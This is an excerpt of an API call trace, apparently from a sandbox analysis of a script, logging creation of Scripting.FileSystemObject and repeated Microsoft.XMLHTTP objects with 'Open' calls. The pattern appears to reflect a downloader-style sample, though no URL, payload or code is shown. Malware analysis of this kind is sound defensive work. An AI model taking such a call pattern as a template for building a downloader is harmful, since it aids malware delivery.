	[0498.052] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0498.052] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x64ef8b0) returned 0x0
	[0498.052] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0498.053] Shell:IUnknown:QueryInterface (in: This=0x64ef8b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x64ef8f0) returned 0x0
	[0498.053] ??2@YAPEAX_K@Z () returned 0x62f350
	[0498.053] Shell:IObjectWithSite:SetSite (This=0x64ef8f0, pUnkSite=0x62f350) returned 0x0
	[0498.053] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0498.053] Shell:IUnknown:Release (This=0x64ef8f0) returned 0x1
	[0498.053] Shell:IUnknown:QueryInterface (in: This=0x64ef8b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x64ef8b0) returned 0x0
	[0498.053] Shell:IUnknown:AddRef (This=0x64ef8b0) returned 0x3
	[0498.053] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0498.053] SysStringLen (param_1=0x0) returned 0x0
	[0498.053] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0498.057] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0498.057] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0498.057] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0498.057] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0498.057] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0498.057] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0499.271] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0499.271] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0499.271] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0499.272] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0499.272] SysStringLen (param_1=0x0) returned 0x0
	[0499.272] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0499.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0499.273] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0499.273] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0499.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0499.273] ??2@YAPEAX_K@Z () returned 0x62f330
	[0499.273] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0499.273] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0499.273] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0499.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0499.273] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0499.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0499.273] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0499.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0499.276] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0499.276] SysStringLen (param_1=0x0) returned 0x0
	[0499.276] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0499.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0499.276] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0499.276] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0499.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0499.276] ??2@YAPEAX_K@Z () returned 0x62f310
	[0499.277] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0499.277] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0499.277] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0499.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0499.277] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0499.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0499.277] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0499.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0499.277] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0499.277] SysStringLen (param_1=0x0) returned 0x0
	[0499.277] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0499.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0499.278] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0499.278] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0499.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0499.278] ??2@YAPEAX_K@Z () returned 0x62f330
	[0499.278] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f330) 
	[0499.278] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0499.278] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0499.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0499.278] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0499.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0499.278] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0499.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0499.278] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0499.278] SysStringLen (param_1=0x0) returned 0x0
	[0499.278] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0499.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0499.279] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0499.279] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0499.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0499.279] ??2@YAPEAX_K@Z () returned 0x62f310
	[0499.279] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0499.279] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0499.279] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0499.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0499.279] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0499.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0499.279] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0499.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0499.280] longjmp () 
	[0499.280] longjmp () 
	[0499.280] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0499.280] SysStringLen (param_1=0x0) returned 0x0
	[0499.280] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0499.280] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0499.280] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0499.280] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0499.280] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0499.280] ??2@YAPEAX_K@Z () returned 0x62f330
	[0499.280] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0499.280] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0499.280] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0499.280] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0499.280] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0499.280] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0499.281] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0499.281] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0499.281] longjmp () 
	[0499.281] longjmp () 
